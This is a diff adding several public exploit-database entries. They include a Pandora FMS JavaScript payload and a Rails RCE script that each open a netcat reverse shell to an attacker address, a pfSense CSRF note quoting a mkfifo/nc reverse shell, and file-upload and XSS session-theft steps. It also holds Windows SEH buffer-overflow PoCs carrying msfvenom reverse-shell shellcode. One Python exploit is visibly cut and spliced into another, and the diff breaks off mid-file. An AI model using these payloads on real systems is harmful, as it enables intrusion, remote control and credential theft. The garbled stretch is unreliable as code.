+//----------------/etc/snmp/snmpd.conf-------------------//
+syscontact
+syslocation
+sysname
+sysDesc
+
+com2sec local localhost public
+view systemview included .1.3.6.1.2.1.1
+view systemview included .1.3.6.1.2.1.25.1
+view systemview included .1 80
+
+rocommunity public
+//--------------end of /etc/snmp/snmpd.conf--------------//
+
+
+
+//----------------shell.js-------------------------------//
+//Create Random String
+function randomString(len, charSet) {
+ charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+ var randomString = '';
+ for (var i = 0; i < len; i++) {
+ var randomPoz = Math.floor(Math.random() * charSet.length);
+ randomString += charSet.substring(randomPoz,randomPoz+1);
+ }
+ return randomString;
+}
+var randomValue = randomString(5);
+
+//Declare Variable
+var xhr= new XMLHttpRequest();
+var Attacker_IP= "192.168.11.130";
+var Pandora_IP ="192.168.11.132";
+var port ="4444";
+//var payload="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f09468e5082e_select=15&form_max_timeout5f09468e5082e_text=15&form_max_timeout=15&form_max_timeout5f09468e5082e_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&field1_help=&crtbutton=Create"
+var payload ="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f096ea47b224_select=15&form_max_timeout5f096ea47b224_text=15&form_max_timeout=15&form_max_timeout5f096ea47b224_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&uptbutton=Update"
+var url= "http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=plugins&create_plugin=1&pure=";
+
+//Create a plugin with malicous command
+xhr.open("POST",url,true);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure=");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.send(payload);
+
+//I am sleepy, i just want to sleep 5 seconds. Please
+function sleep(miliseconds) {
+ var currentTime = new Date().getTime();
+ while (currentTime + miliseconds >= new Date().getTime()) {
+ }
+ }
+sleep(5000);
+
+//Grab newly added Plugin ID
+var url="/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2";
+xhr.open("POST",url,false);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure=");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.setRequestHeader("Cache-Control","max-age=0");
+var payload ="status_hierachy_mode_sent=1&moduletype=pluginserver&edit_module=1&updbutton=Create";
+xhr.send(payload)
+
+var el = document.createElement('html');
+var add=xhr.responseText.toString();
+el.innerHTML = add;
+var dd = el.querySelector('#id_plugin');
+var plugin_ID =0;
+for (i = 0; i < dd.options.length; i++) {
+ if(dd.options[i].text == randomValue)
+ {
+ console.log(dd.options[i].value);
+ plugin_ID=dd.options[i].value;
+ break;
+ }
+}
+
+//Create a new plugin in server module || reverse shell will trigger here
+var url = "http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2";
+var payload ="network_component_group=0&id_module_component_type=4&network_component=0&name=AppleBois_"+randomValue+"&disabled_sent=1&id_module_group=1&id_module_type_hidden=1&id_module_type=1&type_names=eyIxIjoiZ2VuZXJpY19kYXRhIiwiMiI6ImdlbmVyaWNfcHJvYyIsIjMiOiJnZW5lcmljX2RhdGFfc3RyaW5nIiwiNCI6ImdlbmVyaWNfZGF0YV9pbmMiLCI1IjoiZ2VuZXJpY19kYXRhX2luY19hYnMifQ%3D%3D&min_warning=0&max_warning=0&str_warning=&warning_inverse_sent=1&min_critical=0&max_critical=0&str_critical=&critical_inverse_sent=1&history_data=1&history_data_sent=1&id_plugin="+plugin_ID+"¯os=eyIxIjp7Im1hY3JvIjoiX2ZpZWxkMV8iLCJkZXNjIjoiIiwiaGVscCI6IiIsInZhbHVlIjoiIiwiaGlkZSI6IiJ9fQ%3D%3D¯o_name%5B%5D=macro_value&custom_id=&unit_select=none&unit_text=&unit=&module_interval_select=300&module_interval_text=5&module_interval=300&module_interval_units=60&moduletype=4&post_process_select=&post_process_text=&post_process=&min=&max=&dynamic_interval_select=0&dynamic_interval_text=&dynamic_interval=None&dynamic_interval_units=1&dynamic_min=0&dynamic_max=0&dynamic_two_tailed_sent=1&id_export=0&throw_unknown_events_sent=1&ff_type_sent=1&each_ff=0&ff_event=0&ff_event_normal=&ff_event_warning=&ff_event_critical=&module_ff_interval=0&ff_timeout=0&id_tag_selected%5B%5D=&id_tag_policy%5B%5D=&quiet_module_sent=1&cps_module=0&description=&critical_instructions=&warning_instructions=&unknown_instructions=&hour_from=*&minute_from=*&mday_from=*&month_from=*&wday_from=*&hour_to=*&minute_to=*&mday_to=*&month_to=*&wday_to=*&max_timeout=0&max_retries=0&id_category=0&parent_module_id=0&autocomplete_agent_name=&agent_autocomplete_idagent_5f0967a872ce2=0&relation_type=direct&crtbutton=Create&id_module=4&create_module=1";
+xhr.open("POST",url,true);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.send(payload);
+//----------------end of shell.js-------------------------------//
\ No newline at end of file
diff --git a/exploits/php/webapps/48709.txt b/exploits/php/webapps/48709.txt
new file mode 100644
index 000000000..0ba847766
--- /dev/null
+++ b/exploits/php/webapps/48709.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Webtareas 2.1p - Arbitrary File Upload (Authenticated)
+# Author: AppleBois
+# Date: 2020-07-10
+# Exploit author : AppleBois
+# Vendor Hompage:https://sourceforge.net/projects/webtareas/
+# Version: 2.1 && 2.1p
+# Tested on: Window 10 64 bit environment || XAMPP
+# Authenticated User allowed to upload ".exe" and ".shtml" to file uploaded directory
+# More information : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a
+
+POST /Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_type_ex=&doc_id=1&borne15=0&borne16=0 HTTP/1.1
+Host: 10.10.10.2:81
+Content-Length: 711
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.10.2:81
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHtJ36OtVyQuyaY6y
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.10.2:81/Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_id=1&borne15=0&borne16=0
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: webTareasSID=vqg1lbhf9g5esjrie84dsrjjhg; ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70
+Connection: close
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="action"
+
+add
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="file1"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="attnam1"
+
+a.shtml
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="atttmp1"
+
+C:/xampp/htdocs/Tareas/webtareas/files/tmpEDE7.tmp
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="c"
+
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="ver"
+
+1.0
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y--
\ No newline at end of file
diff --git a/exploits/php/webapps/48714.txt b/exploits/php/webapps/48714.txt
new file mode 100644
index 000000000..f1809bd8b
--- /dev/null
+++ b/exploits/php/webapps/48714.txt
@@ -0,0 +1,40 @@
+# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
+# Date: 2019-09-27
+# Exploit Author: ghost_fh
+# Vendor Homepage: https://www.pfsense.org/
+# Software Link: https://www.pfsense.org/download/index.html?section=downloads
+# Version: Till 2.4.4-p3
+# Tested on: freebsd
+# CVE : CVE-2019-16667
+
+# Vulnerability Description :- The pfsense firewall is vulnerable to RCE
+# chained with CSRF as it uses `csrf magic` library since it allows to tamper
+# the CSRF token values submitted when processing the form requests. Due to
+# this flaw, an attacker can exploit this vulnerability by crafting new page
+# that contains attacker's controlled input such as a "reverse shell" (eg:
+# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port
+# >/tmp/f`token value) in the form and entice the victims to click
+# on the crafted link via social engineering methods. Once the victim clicks
+# on the link (try again button in this case), the attacker can take the
+# lateral control of the victim's machine and malicious actions can be
+# performed on the victim's behalf.
+
+
+
+
+
+
+
+
+# Create a malicious page containing the above values and once user clicks on malicious link,
+# he will be redirected to https://pfsense_ip/diag_command.php page.
+# Victim will be greeted with the "Try again" button.
+# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.
\ No newline at end of file
diff --git a/exploits/php/webapps/48715.txt b/exploits/php/webapps/48715.txt
new file mode 100644
index 000000000..150301ec8
--- /dev/null
+++ b/exploits/php/webapps/48715.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"/vam/index_vam_op.php"
+# Date: 2020-06-29
+# Exploit Author: Peter Blue
+# Vendor Homepage: https://virtualairlinesmanager.net
+# Software Link: https://virtualairlinesmanager.net
+# Version: 2.6.2
+# Tested on: Linux (Fedora 23), MariaDB, PHP 5.6.29, Apache
+# CVE: N/A
+
+
+This project looks nice but lacks a lot of input filtering.
+
+This example allows a logged-in user to inject JavaScript code, and this
+case steal a session ID, but other exploits could be injected.
+
+This exploit example assumes you have installed VAM 2.6.2 on a local server.
+
+Steps :-
+
+1. Log on. There is an admin account: Callsign: vam100, Password: 123456
+
+2. Click "Pilot Actions"
+
+3. Click "Internal Mail"
+
+4. Click New Message
+
+5. In "Subject" enter XSS
+
+6. in "Message" type anything
+
+7. Click "Send"
+
+8. When the page refreshes your PHP session ID will show in an alert box
+
+It is also quite possible to inject raw HTML into the subject.
+
+A bit of Google Dorking revealed many websites running this, some were
+dead, some deserted and a few were live.
\ No newline at end of file
diff --git a/exploits/ruby/webapps/48716.rb b/exploits/ruby/webapps/48716.rb
new file mode 100755
index 000000000..690692267
--- /dev/null
+++ b/exploits/ruby/webapps/48716.rb
@@ -0,0 +1,32 @@
+# Exploit Title: Rails 5.0.1 - Remote Code Execution
+# Date: 2020-07-19
+# Exploit Author: Lucas Amorim
+# Vendor Homepage: www.rubyonrails.org
+# Software Link: www.rubyonrails.org
+# Version: Rails < 5.0.1
+# Tested on: Linux/OSx
+# CVE : CVE-2020-8163
+# More information: https://github.com/sh286/CVE-2020-8163
+
+#!/usr/bin/ruby
+
+require 'net/http'
+
+def header
+ puts "[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\n"
+ puts "[*] - Author: Lucas Amorim lucas@lucasamorim.ca"
+ puts "[*] - Usage: \n"
+ puts "ruby exploit.rb "
+end
+if ARGV.length < 3
+ header
+ exit(-1)
+end
+
+url = ARGV[0]
+ip = ARGV[1]
+port = ARGV[2]
+
+puts "[*] Sending payload to #{url}"
+uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")
+Net::HTTP.get(uri)
\ No newline at end of file
diff --git a/exploits/windows/dos/48697.py b/exploits/windows/dos/48697.py
new file mode 100755
index 000000000..38f894619
--- /dev/null
+++ b/exploits/windows/dos/48697.py
@@ -0,0 +1,33 @@
+# Exploit Title: Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
+# Date: 2020-07-20
+# Author: Felipe Winsnes
+# Software Link: https://www.exploit-db.com/apps/463c9e7fe9a39888d3c01bc9ad756bba-UpSetup.exe
+# Version: 3.5
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Sadly enough, this vulnerability is not exploitable as there are no friendly PPR addresses available and
+# yet the vulnerability is triggered with additional padding == can't use addresses with null values.
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file "poc.txt".
+# 2.- Copy the content of the new file 'poc.txt' to clipboard.
+# 3.- Open the Application.
+# 4.- Click on "Settings".
+# 4.- Paste contents of the generated file into the parameters "FTP Address", "Username" and Password". Furthermore, check the box with the statement "Check to save password in preferences".
+# 5.- Crashed.
+# 6.- As uploadpref.dat is generated, every time the application opens it will crash, with the SEH values being overwritten. In order to stop this behavior simply delete the file.
+
+# If the contents are only pasted into "Password", the application will only crash once without creating uploadpref.dat.
+
+buffer = "A" * 477 + "BBBB" + "CCCC" + "\xff" * 2000
+
+try:
+ f = open ("poc.txt", "w")
+ f.write(buffer)
+ f.close()
+ print "[+] The file has been created successfully!"
+
+except:
+ print "[!] There has been an error while creating the file."
\ No newline at end of file
diff --git a/exploits/windows/local/48687.py b/exploits/windows/local/48687.py
new file mode 100755
index 000000000..c4a0d9e5a
--- /dev/null
+++ b/exploits/windows/local/48687.py
@@ -0,0 +1,66 @@
+# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
+# Date: 2020-07-26
+# Author: Felipe Winsnes
+# Software Link: https://nidesoft-dvd-ripper.softonic.com/
+# Version: 5.2.18
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Proof of Concept:
+# 1.- Run the python script, it will create the file "poc.txt".
+# 2.- Copy the content of the new file "poc.txt" to clipboard
+# 3.- Open the application.
+# 4.- Paste the clipboard into the "License Code" parameter within registration.
+# 5.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d"
+# Payload size: 448 bytes
+
+buf = b""
+buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c"
+buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55"
+buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c"
+buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b"
+buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55"
+buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52"
+buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38"
+buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42"
+buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54"
+buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61"
+buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77"
+buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54"
+buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f"
+buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30"
+buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73"
+buf += b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68"
+buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30"
+buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b"
+buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77"
+buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a"
+buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e"
+buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51"
+buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30"
+buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f"
+buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65"
+buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45"
+buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69"
+buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42"
+buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71"
+buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38"
+buf += b"\x53\x55\x65\x50\x41\x41"
+
+nseh = "\xEB\x11\x41\x41"
+seh = struct.pack(" Pack
+# 4. Paste the clipboard into the "Archive To" field and click on Ok button
+
+#!/usr/bin/python
+
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c"
+egg += "\x25\x4A\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+buf = ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+exploit = "A"*4112
+# 0x40012623 - pop pop ret rtl60.bpl
+exploit += "\x74\x06\x75\x04"
+exploit += "\x23\x26\x01\x40"
+exploit += egg
+exploit += "C"*(5000-4120-len(egg))
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48689.py b/exploits/windows/local/48689.py
new file mode 100755
index 000000000..ece7e4d0e
--- /dev/null
+++ b/exploits/windows/local/48689.py
@@ -0,0 +1,100 @@
+# Exploit Title: DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-26
+# Exploit Author: MasterVlad
+# Vendor Homepage: https://www.diskboss.com/
+# Software Link: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
+# Version: 7.7.14
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 32-bit
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open diskbsg.exe and go to Tools -> DiskBoss Options
+# 4. Go to Advanced and paste the clipboard into the "Reports and Data Directory" field
+# 5. Click on Save button
+
+
+#!/usr/bin/python
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+buf = ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
